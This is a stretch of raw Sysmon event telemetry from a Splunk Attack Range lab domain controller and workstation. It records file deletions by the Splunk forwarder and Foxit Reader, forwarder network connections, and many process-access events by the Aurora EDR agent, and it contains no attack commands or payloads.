12:21:12.193{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78513C864DE1686003D32C53DD736750,SHA256=1F772E413A5DFEABFFEA735F8676A5A2541D753E0325927F0D81CE07A5F87554,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000041559Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:10.699{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56287-false10.0.1.12-8000- 10341000x800000000000000041558Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:12.280{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 23542300x800000000000000016251Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:13.291{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0986DABB97416CDD0225FA3415ABBDF5,SHA256=4748659093FF3B547B1FB0961A574773A894DA395FFE00AD2D10C2DAC6428B9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041560Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:13.289{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FCFEC51EC7410007CBAE0ECB7F5DAC9,SHA256=2590B1E1AA93F31199777FDC5514AA0C4CBE0AB7F81733B041EFEB3F44CC2CBF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016252Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:14.366{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BE19D449CC0B85731AAA917EBC5C879,SHA256=CC9AF03FBD6397F882283CADD97398F395A44C6B1ECFEF7AB9D98116726E0324,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000041585Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:14.917{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041584Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:14.916{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041583Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:14.915{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041582Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:14.915{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041581Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:14.913{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041580Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:14.907{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041579Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:14.895{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041578Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:14.862{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041577Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:14.855{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041576Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:14.846{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041575Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:14.840{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041574Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:14.839{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041573Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:14.836{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041572Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:14.832{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041571Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:14.830{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041570Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:14.829{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041569Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:14.826{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041568Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:14.825{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041567Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:14.824{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041566Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:14.823{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041565Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:14.821{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 23542300x800000000000000041564Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:14.717{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\ProgramData\Foxit Software\Foxit PDF Reader\FoxitSensor\Sensor.db-journalMD5=C04EED139F6C5FC49DD4BE799456C492,SHA256=54B05F52E5A8412865B8829C7C9A6D0210A7C8E1BD29C22AD615FC1B5ECA2198,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041563Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:14.335{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=595CBE6F0543BDCA4C16881127932D57,SHA256=11F30A7896F94D07292CCC4B5E60EE7C22FAC8642BB295357535D4017D9BF3B9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041562Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:14.317{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041561Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:14.315{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 354300x800000000000000016254Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:13.956{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50087-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000016253Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:15.439{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE193E3CD88A3A90CF47C65AA02E1AFB,SHA256=30749F737771A381CABCC92DF2F65FFD4F4BC7577A71F9F4D279F30059DF7231,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041586Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:15.429{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E99986613C6B16A82FBE8B994A3E0D9,SHA256=688A919C31BFB7E7CEA5577F0DD2E9F40C6AAA475C4B91AD06A63551C654F843,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016256Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:16.520{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=912A7790434B2E2CF6E54B1DDB79F24A,SHA256=BEEA6706B68767BFD44B9BCDC6BF89AD70010414824D11FDB3AE3F035C1EC1FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041587Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:16.523{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program 